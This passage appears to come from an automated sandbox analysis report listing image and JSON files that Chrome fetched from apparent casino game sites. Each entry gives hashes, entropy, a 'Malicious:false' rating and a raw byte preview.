                                                      SHA-256:903FCABEC6D3DA2728B5C6FCB183A9C79FE17A829D50A3AD51557905FB7CE6A8
                                                      SHA-512:FB634D19C61ECF7A442D5EB6D538F0679B270478F61FC74C2EF5D84F7FF376E946E6D51A6CBACC2D8744E3BF803AD389764A26DF1E418C68CA9B00503B2FE8DC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/common/storage/cms/cms_1045.png?v=1611754636
                                                      Preview:.PNG........IHDR..............P......PLTE................................. ........"..#..#........%..$.. ........l5.i4.8.....d2.b).2-):...w..h.? ..."%..I$.Q&..?/.O.W+....M".;58..*N....|7..d2.P".....#Z-.._..B.......B..................`..W3|iC."... @"...L....*]5...Y'..>C.d.....l).sI.eL..Y|I..f.b$.@z`?....!....?U.6.n .......(!x.!.....W..;...T..?..|.............>.z.....vR.......K........^qFC........n..o...V...\D....6&.n`...8'..............................#..o6....,....j................4$.....X.....I....@........O5.@+ C1*...N:2.........+..S..TDAZD0...'$&H$..........d'|iTbRLmI#_?....9...s`...eN:.....u@AAFqZB.$...|.p]TzS'.........Tz@.....{OOV.M?....y.5&....]Q....b.W..s"+@...}xrnkn_]^\,.....\............i.zo.tmd......G....ka...._>.....3'..n'=.I....:-.2#.[..9/5!a.........tRNS.....*1#:EOCY.nxd.cPZ.....:o.............v..c...R...............(d..............B.......P..s}..'.....^V................X.......p....^YIDATx.....0.CQ..i..Pd.l...6..A.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 280x200, components 3
                                                      Category:dropped
                                                      Size (bytes):28872
                                                      Entropy (8bit):7.97689892885406
                                                      Encrypted:false
                                                      SSDEEP:384:R8mvRXApP4Bha1aoq9yq42F7eb51sROx4pJTwsrcLCYsMvnQosNofay:K+RiSk11Gyq42I7sYOT01/vQosFy
                                                      MD5:E902CB28E92D9E90B4A622097D1430BC
                                                      SHA1:575E64AD1692AFFE700076D96134F35A6D918E43
                                                      SHA-256:FC0FC5CF76E65E63B085169798410C495C5F8981655588DFFA5F98384F33AD22
                                                      SHA-512:321A2C0381D1998403B8C035A34C31A69EC1E323479F404C835E5110092A5507E07FB1928C0E5A701CA0B8AC0EB515C3DD025CABA40A31ABD2D0E1E87AAA5241
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C..................................................................................................................................................................I.......zbpF..........c..f.n...@.C..j...................-WF...U:.P.oe..\..q.......-.7Z."u9,....,..7^/.....^..q...........6....../U'#..^-`..*.;......Pgd. ../..D.......\........FW..:..<8X.I..qH=.Yw..g.V2........m...E..2..S.3RJ.w....r....$.e.q.t.N..<.?g..|.._..C+.N..:U._vk&...$.R.T2H.#...$.......-...z..?........?.@.v.W.2Y;k.g...zt.'FE....i3....K^...Y...)#..#-.....gKD.s.7...........0..3.&.U2e9wy.....@.g;...K.O.nls..V.......Z.H..Z..J...Y.. ...Y...rt)5R1.E./.W-.Q.6.&.......(..U.L....O&r.\.|.V.....f8......7.S....`....j7..I...J.z'$+...^U<t.j...i.A[u....=...+Z......8}.I..j.....+%.QK.r..o...1...H.Ro..l...NC....3.s........J...#...'..b.}......V.d9.....l....|.\....e\.g..u..x.......\......2.WW.JE......K......P..L.Z*"T.m.P.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 844x214, components 3
                                                      Category:dropped
                                                      Size (bytes):29389
                                                      Entropy (8bit):7.979328075548999
                                                      Encrypted:false
                                                      SSDEEP:384:zOAdT2hjDL1C5uPFNiaxOmITLsTeZXBq3lz2HrqFrRmxbpyHovTaR65hcOFEgGUe:pEhjDgCLICeZXBKlxYpKov9ZEFt2G
                                                      MD5:38C80C4E821869DF9AE28040C4E2ABE4
                                                      SHA1:DE9D8A0F1E6628DF841EE9D05B0E0AC4678D7188
                                                      SHA-256:F6D5607FE56E39EAFFEAEE05A3E7392BD9ADCC9275E7E63F67881DB018B68B73
                                                      SHA-512:E84587A9BD387755437EFB56331B2BC7A0E1140AA41F2F645F68B000B1F0BE806B30AA435C6D6DEE5FD49A19C22BA45617C71AFA75C1F2028E65C377EA95F91B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C.........................................................................L..................................................................................8.T.,>..8..L.Fr...1.=..:#...CLMTgCHQs=..&..Sa.E12...Y@.j..KV.....D.4s....CL9/ME..HY9..YH.."...).c........$.e4......:..Y.#.Ek)&P...h.9...o...!.[M./...:...A.C.Rr...a.@.%5<...E..XIh.Xi,$Xr...RT....#..PJ.4h... .c@V.d<.eI#..#J.4.i..."M..I..:..6Hl..R.T5Q..D..>....cf7....A..mc..S`....9i....u.m9(...M"efla......."I.QH.H.......&1.SA.':.Q.,..Fnf...$.....T.BJ....0-.OB.....thR".U3.KRG..........Wf8.|E..S.'.K..4..ZFT..*K.T..J.h&...s....e..>tiRI.2rG(....OY...=`93.(B....V*..$+.L.R...@....IQ..G3d.M.m...Eq...d..5.yj.N....S.g-..u.....x.^S.....B.O*.9..y.."..&U%g[YJ4..h....J!...1........x.Ni..$.P....L..i..d.TzT.LI...tFu...s8...;j...>[.4.4..a...,.H..M..Z.X..n......:sst..5..A!K.>u\.A...._:.H....F...D.......$....c:.7A.....7.4...Xi)Ju7!
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):4.022573883611434
                                                      Encrypted:false
                                                      SSDEEP:3:VJWQoTkqF5wS:VYQoTb51
                                                      MD5:27A5688B27AE3688CA0183CE926BE3C8
                                                      SHA1:FA4DEC3B6AF6674AFD7B14710CAC41B15AE75B29
                                                      SHA-256:4359A477FC8CC8212517F5A190D4AA0A7CD1C85509D56D2A6A8EFEF408420AD7
                                                      SHA-512:D73BB567A0B0280D42DDA28C8E97725E96529072BD78D0844786E008D9CE3F89C7C3399EEA85342BE65D7B440D6023094B9F2F5D624E7DDE0A46FBFB1484BC85
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:[false,"\u529f\u80fd\u672a\u542f\u7528"]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 1 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):997
                                                      Entropy (8bit):5.810889627113277
                                                      Encrypted:false
                                                      SSDEEP:24:gr1h4SHWwh82lYSKwN6vYnjVNgUUT3XyJ3VRWN6v/GN:WKS2vnLi9jpUeJ3Q+6
                                                      MD5:955BEB1B9BA757816ADDCCFA9AA004DB
                                                      SHA1:29BB129B21488EDE5A1871ADC1EA976B5D8BE43E
                                                      SHA-256:C86644377BC0E1C60D81D1B91422BE4A6F042623FBF16984D98FBAC0B2893D99
                                                      SHA-512:F3CBF35FEC155114E23785A11E576B53CFA908317CA2B2272C01188A265F547ABC5347C6199F77FFF0F29466F9FE0BE522E87BB34C8BB739998E4673BC56D6E5
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............!p....tEXtSoftware.Adobe ImageReadyq.e<...iiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:75C8186921AAE311B4D0B41277BB2166" xmpMM:DocumentID="xmp.did:9D913CF2AFCE11E3A70D834307AB356B" xmpMM:InstanceID="xmp.iid:9D913CF1AFCE11E3A70D834307AB356B" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:eab1b3ca-5aed-2748-ac5e-b3ebee2c1920" stRef:documentID="xmp.did:75C8186921AAE311B4D0B41277BB2166"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.[.e....IDATx.b...f.....0..V..C.......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):25426
                                                      Entropy (8bit):7.9888984456746295
                                                      Encrypted:false
                                                      SSDEEP:768:2AYrR0fnylK/z3rI48gLpH/f0Qy2yXY2WVa:3Tyirt8qf9JR1Va
                                                      MD5:F5D8F4269FE5102095E970A947E2DD3F
                                                      SHA1:235DA9BFE5108D060EC815F604E4B8672D45E3B0
                                                      SHA-256:E92A6E1B5EAE15492681F6D5D1610E17A7A0AFD2F4B929248DE15B2E2C19BCB7
                                                      SHA-512:0EBE37D38FE29577017807D5E92BF65682ADAF131C578049D623701917E1F56777C54F478415052C4FB0D0272535058AEB635CDE27BA9EF15B3C4F66511360CB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE[MA1("+".......7-&bSF$..<2*...TG<B7.n.. ..UE2...+..G;4...jZKM@7...d..4..=..ca....x........Y.....Q(.G%.ZK7....U+uv.Y2.......jh....f/.q5..R).a0.o4e;.raRbQ<....E....`......F"N..}iW.L!e*.....W....?........i6...oF.]%.....C...{9.....I&{H.iXB...|s..[..yA.`1...m9..c....{; -...P.L.....Z..l...&..|h.M.;..U2?..._9D...P..y.I..2vF..f%...ko..x:.t............)N0...6...seucH]7..........._....vR=&v1....S...:.....t<.......m.....&............e?%.....iE....j..!~D?.-.y u .....5.......".Y.......F.N........{....s..Cx...I..F...w..vT.......y.QM.s..[..!........yQ./......tiC+.....gXLJ....w..n..b.i.bTV....]fa>I..i..U*....{.zO[...naa.....'...`Z.....$znk.%..2.8.@..lk...............C.~.......uo....=...........[.HBO.UM....~.1%tg.......`Uo.........`.IDATx..oh.e...+. q!b....k...RDo\L=....k%.h....QS.YS....E.@;..,.....[.....X..V.T...p..~..'$].9..<..K6.....PO...CE.tu...{{..H....X.......-.Uf......7==..!..A.mZ3.RM73Qx:..w.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):24003
                                                      Entropy (8bit):7.9828261784648324
                                                      Encrypted:false
                                                      SSDEEP:384:uWRXopvzA2HSlbWsHubrfXhXoC0lAzfqgWoeveEci33lgLqXI9WpIbl5iLgYLt21:ZRXALR2ybzK0diXHlg24kpkviEZ/JpV
                                                      MD5:575466064E01E777D61674EE695DFBAD
                                                      SHA1:F84BAAA2EDF3139CDA4656C2B843392A402F239D
                                                      SHA-256:7179337CF4F70FB0DDAFC83526F70A234DF6FE3E213F574F866B89F7D8D6ABED
                                                      SHA-512:7559A45EEBD319BEC7450386F79210106AD0AA24C204092AD40D8465F912CB5673AC2A75A7D8E7683768A54C96DA8D685A22E215E18CD6AD16E323ADAD4362F7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE.....".!6..2.......2J.....(.%9.5N./G.,D.8Q...HHH.&=LLL.*A.:XQQQ...TVWZZZ+*(432@?>DDC`a`777....K.//.pqp...;<;www.R.....O)N......N.. %-+F#$#._.....AaoH .<....hhg.39.+/54Ni,..........mL.......Gj.Y&......%.6....mw.AU@...al.dD.%.a>....X.....7............Ua{9.......\7.y.E]k.h,.H.#...W;...}R$.8>|.....]|~uQ..<C._.Q2..k.....6......g......>Ue.GL.f..;..xA.......g@..\..NV......_..zD.;MZ.o.'lr*.....Tcg.{Y.}.....PY!.>....t..g..q..Pv.f,...p0...[ksh...."...l9&.]..;D>qz...#^d.z9.....$9CI...........]..M..M....@r..+CR..;l...v..|h6.5.......~.w........+.....<...CUD*....[..D..h..E.....QD...<m...f..4.....Q...2......fX)....'.....p.F.........S........wn....W.m...%.......`u.R.....X~hOa\<............cQ..@......v...f.......dS0..s...H.|...NF........+).....b....Z~IDATx...oH.a....[o..W...4....M...YD..jA..]mCj...V.....@_T.i...7.?"........./..E.../.=...\[A}...1....s.T..z....p.T0H.U.=.lT.@8\.b.9.lv9.@ .*p.B*.. K4.........U.zlA...2.......\HV
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):6451
                                                      Entropy (8bit):7.937442105949379
                                                      Encrypted:false
                                                      SSDEEP:96:PNHrCzEt7hN46kZVVtA1VCLDwX4RbzUIKxczz760za2w+Palwj/dBGc5Pf6lMIQ:lQPfEEL1zBKxWE2w1lwj/VfsMIQ
                                                      MD5:F902D04FDF4C35A29DB78B8DB71862BE
                                                      SHA1:0C955FA290ADF74A6740A3F8DE830BD8E680B0D7
                                                      SHA-256:7C68E6435C6596E06354872485D3E44D241501B7F05D04F2D167A5DE93D53074
                                                      SHA-512:5F982FB0AF460ADD20679351B6967A731ED2C3D1AC3F6D8E7698ACFBDC4CDF3E5B29D232086F15EE4183C1A1F25A1BC235BCD2E4EF0D7FCA58D3F7DACFA1374D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....IPLTE............hs....-_.1a...V..k.gq.Fp.......x....-]7Fp.:hKU}.s..K}%...a~|..<..g...].#U.^..;0d...!....[.:`G...>d.)P.'N.([.,N)..2|..r..>f.....\.*_.2c.6j.?t....*d$)d.Ey....L~.../(c.S.))h....b..Y....;(k2)k.i.....$g....w..$\.o.7(eL'cD(kl)qA'c.'p.]..~..s.L&j~*s]&mT%lf%nl%c.&\V%c.,ux'q?+nt-tW,`v%b.$b.'Y.&TK,od$c.(\c-_.'f.+q.)h.'`.&\w-\.(Z.'Q.+t]%c...T-n.,U.*o...)t.,Z...^.q.'d.'].(^.'^.*Qn-\.'O.(m.,W.,T.-tx.i.)f.)O..d...l-f.(N.+t.+t_-h.&f.-t.....c.1t..r.-q.-f.z......u.%f..eFT..../l.{.=v.$:i.|.]../c.......Yh.......L.7......e.oL....k~....u.....8..[I......G...N....b..0Ht.I.88...../tRNS.. .Fr[..C....M.`2....y..[.A.p.............(O.....jIDATx...1..@....G..u...L(.j......x.K*;.:L.s..C"........S...................>O..1.1F.P.Z.M.]..*n.r....Olt..G.....}...rr.b.Y..|$iV..oY*.E.ey8...9,+....>L...h.E.E...N:N..].w.Y.0..;_S=. .k..q]\.....T.]....Z.....#...t9......&.(..-....(....D.k.a.......5..H../+}.j..h.......0H......ba../.w.3O.H.......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):202
                                                      Entropy (8bit):4.3069982798699185
                                                      Encrypted:false
                                                      SSDEEP:3:x1D3w9xJHvFMHY1S1rz9UzWReHv0DS1JA9cUQHv8GOVKLJY3vEJG3w9MQJMJHv1n:jOvFM418Vav0D83v8mJYfYGC4v1
                                                      MD5:61D2133B3F83A01A2619EC2F30862A99
                                                      SHA1:5C09FE957AF5C761B9B682D62F0CCBF6D09A9499
                                                      SHA-256:F7BF42CEA3BE2A8622DE57570036A38B20B36A24E99E6937C661A11A985E6D87
                                                      SHA-512:CE6C431B772AF0DAEBE967224A45CF598BC28EBF0CFD9B7785E81765D3EAECEA727AB363D4B8B4EC5824DF5F078BFC69F946F0CD17DD39013393A5BFED0F04E7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/getcatlist/202
                                                      Preview:[{"cat_id":801,"cat_name":"Hot","icon":"popular"},{"cat_id":802,"cat_name":"Newest","icon":"new"},{"cat_id":807,"cat_name":"Jackpot","icon":"jackpots"},{"cat_id":"all","cat_name":"all games","icon":""}]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):17173
                                                      Entropy (8bit):7.958458639912686
                                                      Encrypted:false
                                                      SSDEEP:384:E6cwcC3wp4aJ51Vebop1AoKeDwJhqSg6/0pPeXXfY:E+3wp/751A4DwHPg3pPUQ
                                                      MD5:0CC619403125894C73CB591AF96DE60E
                                                      SHA1:3C98F73DCDB1F91DE959FA1055956F31BE06DDEE
                                                      SHA-256:831A56775868C3E7BBB403FDAF041CAB1CDAD2CDBF0F6DAC37774654FE268F06
                                                      SHA-512:C865785AFEC23A72B06C495CFDF2BA3765964A067FB10E9A4750388092C9641097022F17341FFA4BBF092244DE49B4DF17A592C33E2EE1BF032F7FE0886F42E1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/rich88/BaccaratLZ.png?ver=1696302818
                                                      Preview:.PNG........IHDR...............^.....PLTE...............V..g..........u......*.........m ...t............r. ......"w...1..|....7........5z.p....*.o.........8..}!..:......w..e~..Cu3.|@.....z.A........6....v..4I..G...1......y.........Z...........4^..(.-....Uu.......)..t..4.I....)!.5.u5......:.....k.D...3..T*....O..l..j.....&.v%.. ....D..O..+...Z.V.......A^...........t;...u >.`..9.|*...S..;......; ....)...`.Y{..$.7.j..}.......2..?........9N.k;.0.P.'..I\....R........z.G.........7<.].....}v .....4.g.-.Io......=....,^.4......c.i>..x+..02.F...5.8......A@.]9...du'.......P.1..y.o`.W.[..C9.Yg.....*U.O=..Y.=......<.)I.o..3.:.....YO.6........O._.....~...F.._qq[C..S.w).GF.!......UKl.%*().B..r..........fRe oz1C.l.J.+.OKM].T....<!...P..?.IDATx....@Te.....B1..e*......&*..(.,.4..+..1..$q.....Z.}Q...b..!E.BY(..Z...u..o...[.v.}>..r.3..}....8....<.s.6....F..........SO=..;hdO=........O.y.M.4thv......`....p.........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 4-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):441
                                                      Entropy (8bit):7.22372680769518
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7DY8VBjIGlhjV0Yk0L2mrgVqpZ6vzVLzbFho/Nz:H8/IUjjc0UqpZ6JLV21z
                                                      MD5:950CEAC8F20AD504E908C855FEF89833
                                                      SHA1:694BDD9709A9BB3BE26C6F7BB350205EB44AC7B3
                                                      SHA-256:E17939202163E612402DBF251414BBB4E5FAFFDD133FDCCD0BF2AFD356E0D635
                                                      SHA-512:07EF639D2D340FE07A2C32C06D67548675B57884E9C89E508CD1ABCE17DAFA0E33BDFF120C5C6F41E7FBB9D68F32908E859ED01B0D6F27A1FDB28B040749D289
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR... ... ......Tg....0PLTE.........|||===```555,,,JJJPPP......mmmYYYDDDvvv...c....tRNS.@..f...7IDAT(.e..J.A..O.....I"..,BJI,,e...4.l.(X....f}.5].0 .XYj..bcacea.S.s..n.W.o..a.@.y!.....Sx..6.G......Yj..t]...+....&....9.R.qw..../!Mm.n$r~&.....4.@f....#.%x...J..#.....c../..z...)...\...m+...i.]#..R..k R.V.B".b.&.H......<=.6....Z...........x\m....j...h.3.U..c4dG:......whG...3......#..Q....r....8N7.j.......IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):27917
                                                      Entropy (8bit):7.983272421406406
                                                      Encrypted:false
                                                      SSDEEP:384:jp3FmE76+ppbrM4enedu98/pBJ0zaYHqtuft9qVE37gbL25Dukb2bV1qg0YK0oyB:tp6yro8TJqaAfHqVEHFabV1aYK0oyB
                                                      MD5:BDAF928BCB7DEE9AF00E294B47996210
                                                      SHA1:C234746607AE19933679102D259C8392C7914D5F
                                                      SHA-256:DF00A69CC011B5A0D2B47CF6AE44961BC84416425B3B1867462FCF0E24627BBA
                                                      SHA-512:48D8AC66217C7E24DBBF412392CA0AFEF94239DD0662D2616D2696473EE4A4AE707F92509C599FE20A9CCC4182E07EC1C3C9A2092DF96A20CABE795F653A556D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE......... ........:..*..#....2/'+5.....!.....-..-4Q...E,.6-3...F!..../.....O3":%............$..L........T[9%/3D..?P)...............X@E`@4:......C..),=g>-K9>7<T.!.KTy.'.( "#&7.......~3..WQ.......`'.GMn..&hB.uO..;.....g-Z2.i1...O}:&%,K<Fk..... ..I.....#.?...E.Y%.,....../..k..E...{....|.N.RCG.w1R....._'!jN5....t.x$...d....@..G.u5..4..5..8..g....zM9..+2?_.j4.F.e*.|o./Zf|....V..:.o..Y+.J...(.j1../....3..waP.G.jC....a.R/.T..T;..9P[..E....]h..<@l..hU.s.....j9f....y.O.mx..{c.RD..k.shC...H@,,./0.Z..gZ@BG.C..g..E.].QPScQW.~....rdk../iu.k...>...`..e..H......D.A.....X...Pr.*VE..X.'?.....|~.W.V..A........hs...AO~..6=......+..[#^.c...u...G..............s..B..].**r.......z.[..#V_d...{..LE.*W..n.@H....Z./.. .@...u...u.].hS......YC..j.A.....9N..N..i.IDATx.l.Ok.`..nq+s...5L..2....@.!O..@pn"..`SZ..r...].^.e ..<.P(.. ...n..+..aoa.'.u..<O.'iC....<Z....b.Lf.ZM.G5..'*GjJU.E...JXfY9..B....A.+.....<(..w.]J.Z.t.....O........6.U..m...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):27717
                                                      Entropy (8bit):7.985507739175344
                                                      Encrypted:false
                                                      SSDEEP:384:UGsHrgHdxIX3P1jv8Dd2hOq5gG8mBJyLAN4N7lgtMcKRmN5XKMW8f0vUu0mHj+mY:UnLQdaXfd8D0L5txu7GtWmz6MYDmOU
                                                      MD5:64E9054CF014D05159260919646D8B40
                                                      SHA1:535F771A80173D0612CF3F554C4865022F31A210
                                                      SHA-256:C6FCD169E16A7DDBFFB416B2CA5C4EDA8817880790F03FFA344ADA2C93C1C42D
                                                      SHA-512:BB2FF96CD5C747036FD551E4CF2562C24454FB0F250A3E05642D554917F720537438FE467D706083965D92700E777F93925BAAEA18F71F4B96B9129A7A5DBCA2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/86hskqb38a9ua.png?ver=1722582213
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE6.$X..S+-7.!@.+F.#2.%/.$3..8.(,%&?../..*..="$,..R.'\!.e(&.....#I.,1..]$,G)*x8%.."&..5..k4)b3.f.....E...S8...P,.c2m*.Q..L..^7*.@'S4%..?....X-.V.K..Ax@2.F.m8.F..z..~&.'?".w)'#..G3=.55.G4.v8y/4.{..ri....E$R.7I,..wu.>Pp.,.2iD2.j..."..=.5D..rA....Y*.......X..!.-D%m~.!..\..e..b3;ZJA.)...<00....X..q..m.../!0...M<.....OgWSO .0.S.....F.8d.H9..T....vY6k:....pU....?u....'.D....b G...^. .nJ._..[Bc.A.&.)U..u$./.1...s.a.e.`.{A.T=8.K.....u.O..^..1.m.M.s.{.d.{H.[?...eE..a..hyeRyOD..C%....:./9.oQ..t.I.c....+.e....T.77.L_.fe..9.}.....+.'v..M.0..-..3U....m.4.....%/..AW~.p.tkl....UH.WN.... ....?.n5..1.....b4..3W.....`=g.C..3...[..T.9...>J^.....id..r8...Va06ENne.......x..}h.?...........u.\p.m.....<].I..U........v8.y..AH8eB..Veq.U.x_..A^..../r.... .IDATx.d..X.g..M@,..$..@...%.!...$D)J ........#".IA\....4b..D..E..T@,:Z\..RK.Z..8Z..:....7.y^w.v.3..x....^.....;.e.}......A...?.s.|=.._.v..8..'...?...Y.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):6731
                                                      Entropy (8bit):7.854019698569401
                                                      Encrypted:false
                                                      SSDEEP:96:0Bb8SP4mDKDVi/1Zs2HRS8g9ZUuOD5XuVIhC3ivuruVWosomzWXxzwOEJflnW:gRfKcTvHDuO5uVIh12ru4oyzWWnW
                                                      MD5:C7E5790C6C7E8C6065DB320700A9D86C
                                                      SHA1:7C1B56F12B19A444745EE6C1E21F1A61AA589A98
                                                      SHA-256:6212A0AA60673D8E46662C3FC5067960DDFEC8EE81099B1BADCC6A698BC7A9FF
                                                      SHA-512:59A8B67A9F5D0ED98C69D9AAE87B5DD4F321426314F153B5D1DFE9E09CF458244CB7C78A57137CDCD138BE325BA5A682A975E3F559309CAADFFFA630E3E446BF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/187_egame_logo.png?ver=1688355077
                                                      Preview:.PNG........IHDR..............P......PLTE................>...................,..9.....G..T........?..@.....C..;..B.....E..%...........C..D..>...F.F........>.....'..,.....9.....6..6..C..T..:.....}.......(.....8..-..[..-..8..<..7..>..D..%..B.....{..!........E.....7..,..............6..,..9........y.....9..#..<..E........@.."..X......H.$..P.....E.....c..]...@.......Z....._......D..C.Z..{..k...@.R......A.@..F...V..E.C...E.@...A..A.......k..2...@..............F..>..>....G../..'..+..)..2..-..?..4..D..7..C.....D..0..C..;..?........C..9.....?..$..n.E........D..C....._.....>..O..b..@.....\..Y..>..V..i.E..f..S..@.."..L..B..I........@.....r..@..A..A..E..!.....B..F..u..A.....B..B..{.. ..~..x.F..F..k...?....D........A.....B........................@..@.....A..B..D..B..C.....E..C..E........>........@.......+N.....tRNS.. .p...a.@..5...._@...a..6F....$..]S2.~,JR....ro...)..S..h.yc...RM....-.......<........I.....xbF....oa6.......c$.....:..slV.......u...oIDATx...........................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):29124
                                                      Entropy (8bit):7.985608288203439
                                                      Encrypted:false
                                                      SSDEEP:768:lSrHchIS58l+r5CJJr/OiIeu+HyZw7Xm+GSHg1L:l+kIsQu47mdMHZOdR
                                                      MD5:FE282597F7E9143C4DD411A483AC1F02
                                                      SHA1:425322F3D92632BDD0B52E729C1E4085770A7EE1
                                                      SHA-256:E84858C9F48BB7B4717B471CDE44B982E13BAD02C7C8CFBEAB185476864A351E
                                                      SHA-512:956B34A1B217F013DE76286FE419AF1FA5200DBF1FD733D1567DF60590016462ADC63531276F0AB7E535D4EA50351CFDAB30B31C24F8BAE7B9DB63FF4D0E8E85
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE... ....... ......V00$..=..P*.+..+..".%Y680$%".....G$%_>>...8.....:($L;3q23Q...-+......SF;&%-I.....N/#.....)\JH3#....}f`.....pV......ebip\U>58Z"!..,..^4,0Z8...Fb:,.p.fV. /r(%kK...R4....d,...{iRGyX$e%$.32.UGiG4r:.F.,B*..VSe;.N$..zaTU^..m>4*LGQ=.....wuFA..0DC@.1<Gh..n..PtKM0..:....aH.M<..).ulyB*..3.%.k..B....X..Z......Ca35F.*:*.7.W...`WR..>.g).}$gkR^p..Mr.L.!s...|.5.....?.Y.7BT..%&/E..0.]Z....d.......3.qf.}<.:7..K...."f.Rar....#../]y.....t|_.8O(....pXZB...lS..T.S:upx.u!....G.k0.7|..u.ri.]......M..=......K.h.Y...7...Y.R.DP{.{TI4D)...~/,6]./.....7|"...K..h..m.N.......e.B~g@.@A...b.....7.&i..C..hC.S.vz..t....a....)d..W..`..... N@k..IA.b..~....2...~...K..xTx.O\..e......$M...-.........o.........0....]..?b..O.....o.....I(...n.IDATx.t.]h#U..g&3..d.I.|hk$%..6.I...$.c..mS.@lZR.EK]w.\.%P...4.,."K../..E.Z.E|..]......Z_DA...w&........=...9s)..p........J.6.^k*.'...:.O....@jc((..'.HF.f...&l..=v~.......%.I..t..D
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:dropped
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 21 x 12
                                                      Category:dropped
                                                      Size (bytes):1251
                                                      Entropy (8bit):6.823158450416459
                                                      Encrypted:false
                                                      SSDEEP:24:tal1hfvWwjx82lY2T3JVl9yJ3VD60GY8vk2n:GANn2NIJ3jL8L
                                                      MD5:25F6274AA9E9E073709978B30CF559C4
                                                      SHA1:A7CBD2BFCC634F40DF01E0195E2CD666A22A7291
